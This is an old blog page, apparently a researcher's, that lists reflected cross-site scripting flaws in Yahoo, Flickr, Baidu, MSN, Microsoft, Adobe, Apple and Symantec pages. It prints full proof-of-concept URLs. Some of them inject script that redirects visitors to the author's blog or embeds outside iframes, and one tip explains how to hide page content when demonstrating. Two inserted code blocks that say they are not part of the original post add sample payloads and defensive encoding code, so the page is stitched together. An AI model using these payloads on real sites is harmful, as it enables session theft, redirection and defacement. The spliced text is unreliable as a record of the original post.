Hermit Reality<br />
Only dust here...<br />
<br />
2016-12-10<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<h2>
<b>Shadows...</b></h2>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdZ_bnqqW0Uho3eB7wqPE6VCRZkIZL48hKyDC2-DNrE-H9gt59lyF1xjxoO7g-MRedbXXq20YQWtSSl8qFmEj8TfUhnQLeX8HQHcDbHIgW9v4To-gP6-oNkjPbQPf0MUKzXkPhL7BLr0Vx/s1600/24417f1b5e8224c791c8b070f03b381c.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="392" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdZ_bnqqW0Uho3eB7wqPE6VCRZkIZL48hKyDC2-DNrE-H9gt59lyF1xjxoO7g-MRedbXXq20YQWtSSl8qFmEj8TfUhnQLeX8HQHcDbHIgW9v4To-gP6-oNkjPbQPf0MUKzXkPhL7BLr0Vx/s400/24417f1b5e8224c791c8b070f03b381c.jpg" width="400" /></a><br />
<br />
Small note<br />
2012-04-09<br />
<div style="text-align: center;">
<b>For those who still think that the Yahoo screenshots are fake or manipulated (there are a few such people): the answer is very simple. If you don't want to disclose the content of the current page, just use "document.write" before "alert", e.g. document.write('something');alert(/another something/.source)</b></div>
<div style="text-align: center;">
<b><br /></b></div>
<div style="text-align: center;">
<b>Here is an example:</b><b><br /></b></div>
<div style="text-align: center;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/9ymSW.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://i.imgur.com/9ymSW.png" width="355" /></a></div>
<div style="text-align: center;">
<span style="font-size: small;"><br /></span></div>
Several XSS flaws in different Yahoo! sub-domains<br />
2012-04-08<br />
<div style="text-align: center;">
<strong>One of these subdomains has a very "strong" filter: <script> is blocked... but, no surprise, <ScRipT> is allowed</strong> </div>
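Why the filter described above fails, and what holds up instead, as an added example that is not part of the original post (the function names and the template are hypothetical). It goes slightly beyond the post by also running the `<img ... onerror>` shape that appears in the adobe.com PoC elsewhere on this page:

```javascript
// Added example, not from the original post; all names are hypothetical.

// The filter as the post describes it: exact, case-sensitive match.
function caseSensitiveFilter(input) {
  return input.includes("<script>") ? null : input; // null = request blocked
}

// The obvious patch: match the tag name case-insensitively.
function caseInsensitiveFilter(input) {
  return /<\s*script/i.test(input) ? null : input;
}

// Output encoding: every markup-significant character becomes an entity,
// so nothing depends on recognising a particular tag or spelling.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Hypothetical template that reflects a query parameter into the page body.
function render(q, filter) {
  const v = filter(q);
  return v === null ? "<p>Request blocked</p>" : `<p>Results for ${v}</p>`;
}

// Regression check: did the reflected value add any tag inside the <p>?
function injectsMarkup(html) {
  const inner = html.replace(/^<p>|<\/p>$/g, "");
  return /<[a-z\/!]/i.test(inner);
}

// Constructed inputs using the tag shapes that appear on this page.
const SAMPLES = [
  "<script>alert(1)</script>",
  "<ScRipT>alert(1)</ScRipT>",
  "<img src=x: onerror=alert(1)>",
];

function report() {
  return SAMPLES.map((s) => ({
    caseSensitive: injectsMarkup(render(s, caseSensitiveFilter)),
    caseInsensitive: injectsMarkup(render(s, caseInsensitiveFilter)),
    encoded: injectsMarkup(render(s, escapeHtml)),
  }));
}

console.log(report());
```

Only the encoded column is false for all three inputs; each blacklist variant lets at least one of them through as live markup.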
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/X17WA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="348" src="http://i.imgur.com/X17WA.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/tmSeM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="331" src="http://i.imgur.com/tmSeM.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/A9y7e.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="330" src="http://i.imgur.com/A9y7e.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<strong>that's for now...</strong></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
Do you believe...<br />
2012-04-05<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/UUodX.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://i.imgur.com/UUodX.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/mqafI.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="http://i.imgur.com/mqafI.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/2QCgV.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="http://i.imgur.com/2QCgV.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/oLkeu.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="http://i.imgur.com/oLkeu.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
XSS in flickr.com<br />
2012-03-28<br />
<div style="text-align: center;">
Several days ago I found a trivial cross-site scripting vulnerability in flickr.com.<br />
<br />
The vulnerability was fixed within an hour of the initial report. Thanks to Joshua Cohen (<span style="color: #6fa8dc;">@heyjoshua</span>).<br />
<br />
Some screenshots:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img571.imageshack.us/img571/1815/flickrxss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://img571.imageshack.us/img571/1815/flickrxss.png" width="320" /></a></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img256.imageshack.us/img256/8610/screenshotflickr2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="http://img256.imageshack.us/img256/8610/screenshotflickr2.png" width="320" /></a></div>
<div style="text-align: center;">
<br /></div>
Cross-site scripting flaws in Baidu and MSN<br />
2012-03-21<br />
<b>Sony </b><b><a href="http://st2tea.blogspot.com/"><span style="color: white;">st2tea.blogspot.com</span></a></b><br />
<b><br /></b><br />
<b>...in baidu.com</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img838.imageshack.us/img838/8264/xssbaidu.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="http://img838.imageshack.us/img838/8264/xssbaidu.png" width="320" /></a></div>
https://passport.baidu.com/v2/?reg&tpl='"></script><script>alert(String.fromCharCode(88,83,83,32,98,121,32,102,108,101,120,120,112,111,105,110,116,32,38,32,83,111,110,121));location=(String.fromCharCode(104,116,116,112,58,47,47,115,116,50,116,101,97,46,98,108,111,103,115,112,111,116,46,99,111,109))</script><br />
<br />
<b>...in .msn </b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img818.imageshack.us/img818/552/msn1xss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="246" src="http://img818.imageshack.us/img818/552/msn1xss.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
http://fitbie.msn.com/get-fit/videos/?vid="></script><script>alert('XSS by flexxpoint and Sony')</script><iframe/src=//st2tea.blogspot.com width=900 height=800 ></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img707.imageshack.us/img707/5277/msnxss2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="http://img707.imageshack.us/img707/5277/msnxss2.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
http://sport.be.msn.com/running/nl/nieuws/article.html?Article_ID='-->"></script><script>alert('XSS by flexxpoint and Sony')</script><iframe/src=//st2tea.blogspot.com height=800 width=850>&utm_source=msn-sportsbox-nl&utm_campaign=sportbe_rss&utm_medium=rss</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img59.imageshack.us/img59/1410/xssmsntw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="258" src="http://img59.imageshack.us/img59/1410/xssmsntw.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
http://topics.msn.com.tw/fashion/SearchResult.aspx?d=2"/><script>alert('XSS by flexxpoint and Sony')</script></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<b>...simple </b><br />
<br />
2012-03-20<br />
<span style="font-size: small;"><b>I just grabbed this from Sony's blog...</b> <b>(:</b></span><br />
<br />
Monday, 19 March 2012<br />
Microsoft.com Cross Site Scripting<br />
# Date: 19.03.2012<br />
# Author: Sony and Flexxpoint<br />
# Web Browser : Mozilla Firefox<br />
# Sony Blog: http://st2tea.blogspot.com<br />
..................................................................<br />
<br />
For Ryuzaki Lawlet:<br />
<br />
http://packetstormsecurity.org/files/110597/Microsoft.com-Cross-Site-Scripting.html<br />
<br />
Demo:<br />
<br />
http://www.microsoft.com/windowsphone/en-us/buy/7/compare.aspx?devices=%22%22%3E%3Cscript%3Ealert%28%22XSS%20by%20Sony%20and%20Flexxpoint%22%29%3C/script%3E%3Cscript%3Ealert%28%22Oh..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Uh..%22%29%3C/script%3E%3Cscript%3Ealert%28%22wow..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Microsoft.com%20Cross%20Site%20Scripting%22%29%3C/script%3E%3Cscript%3Ealert%28%22meow!%22%29%3C/script%3E%3Ciframe%20width=%22420%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/SLcBI3JUKZ4%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1HfiVS6apz9Nf2ivkjYS_J13iTDnixo8WEmZ4h5nyTSfxT-brrXv-VQgGg8Ej23sjBhtBqWv7uyZvn3GnzB75_MXtEcc1apeQ30UDcTaTue_oMcR31_fq9-d5yVxJO187Nbp5hOtplg7C/s400/microsoft.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1HfiVS6apz9Nf2ivkjYS_J13iTDnixo8WEmZ4h5nyTSfxT-brrXv-VQgGg8Ej23sjBhtBqWv7uyZvn3GnzB75_MXtEcc1apeQ30UDcTaTue_oMcR31_fq9-d5yVxJO187Nbp5hOtplg7C/s320/microsoft.JPG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/4kJL2Rt-FKo?feature=player_embedded' frameborder='0'></iframe></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
Cross-site scripting vulnerabilities in Microsoft, Adobe, Apple and Symantec web sites<br />
2012-03-17<br />
<strong>Cross-site scripting vulnerability in microsoft.com</strong><strong><br /></strong><br />
<strong><br /></strong><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img214.imageshack.us/img214/4213/screenshot1832012.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="283" src="http://img214.imageshack.us/img214/4213/screenshot1832012.png" width="320" /></a></div>
<strong><br /></strong><br />
Bad fix from Microsoft: the page was XSSed for the first time on 07.03.2012 (<a href="http://xssed.com/mirror/76904/">mirror</a>) and is still vulnerable today...<br />
<br />
PoC:<br />
<br />
http://www.microsoft.com/en-us/together/possibilities.aspx?a='"--></style><script>confirm(/BAD FIX!/.source);/&b=*/</script><br />
<br />
<strong>Cross-site scripting vulnerability in adobe.com</strong><br />
<strong><br /></strong><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img829.imageshack.us/img829/2731/screenshot183r.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="http://img829.imageshack.us/img829/2731/screenshot183r.png" width="320" /></a></div>
<strong><br /></strong><br />
PoC:<strong><br /></strong><br />
<br />
https://www.adobe.com/cfusion/store/html/index.cfm?store=OLS-US&event=searchFonts&type="><img src=x: onerror=alert(String.fromCharCode(74,117,115,116,32,97,32,88,83,83,46,46,46))>&code=blackletter&cat=style<br />
<br />
<strong>Cross-site scripting vulnerability in support.apple.com</strong>
<br />
<strong><br /></strong><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img43.imageshack.us/img43/8107/screenshot18ar.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="http://img43.imageshack.us/img43/8107/screenshot18ar.png" width="320" /></a></div>
<strong><br /></strong><br />
PoC:<strong><br /></strong><br />
<br />
http://support.apple.com/kb/index?page=servicefaq&geo='-alert('xss')-'&product=ipad<br />
<br />
<br />
<strong>Cross-site scripting vulnerability in symantec.com</strong>
<br />
<strong><br /></strong><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img201.imageshack.us/img201/4213/screenshot1832012.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="274" src="http://img201.imageshack.us/img201/4213/screenshot1832012.png" width="320" /></a></div>
<strong><br /></strong><br />
PoC:<strong><br /></strong><br />
<br />
http://www.symantec.com/business/support/index?page=landing&key='-confirm('xss')-'&locale=en_us<br />
<br />
<br />
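The `'-alert('xss')-'` and `'-confirm('xss')-'` values in the Apple and Symantec PoCs above contain no angle brackets, which fits a parameter reflected inside a quoted JavaScript string; that sink is an assumption, since the page does not show the vulnerable source. The following added example (not the author's code; all names are hypothetical) contrasts angle-bracket stripping with encoding for that context:

```javascript
// Added example, not from the original post; all names are hypothetical.
// Assumption: the server writes the parameter into a single-quoted string
// inside an inline <script> block (the page does not show the real source).

// Weak: removes angle brackets only, then concatenates into the JS string.
function renderInlineWeak(geo) {
  const cleaned = String(geo).replace(/[<>]/g, "");
  return `<script>var geo = '${cleaned}';</script>`;
}

// Hardened: emit a complete JS string literal. JSON.stringify escapes quotes,
// backslashes and control characters; the extra replacements keep the value
// from closing the script element or starting an HTML comment.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderInlineSafe(geo) {
  return `<script>var geo = ${jsStringLiteral(geo)};</script>`;
}

// Test harness: run the generated script body with stubbed alert/confirm and
// report whether the reflected value caused a call.
function reflectedValueExecutes(html) {
  const body = html.replace(/^<script>|<\/script>$/g, "");
  let called = false;
  const stub = () => { called = true; return 0; };
  try { new Function("alert", "confirm", body)(stub, stub); }
  catch (err) { /* syntax error: the script broke but nothing ran */ }
  return called;
}

// Constructed inputs in the shape of the PoC parameter values on this page.
const PAYLOADS = ["'-alert('xss')-'", "'-confirm('xss')-'", "us"];

function results() {
  return PAYLOADS.map((p) => ({
    weak: reflectedValueExecutes(renderInlineWeak(p)),
    safe: reflectedValueExecutes(renderInlineSafe(p)),
  }));
}

console.log(results());
```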
<br />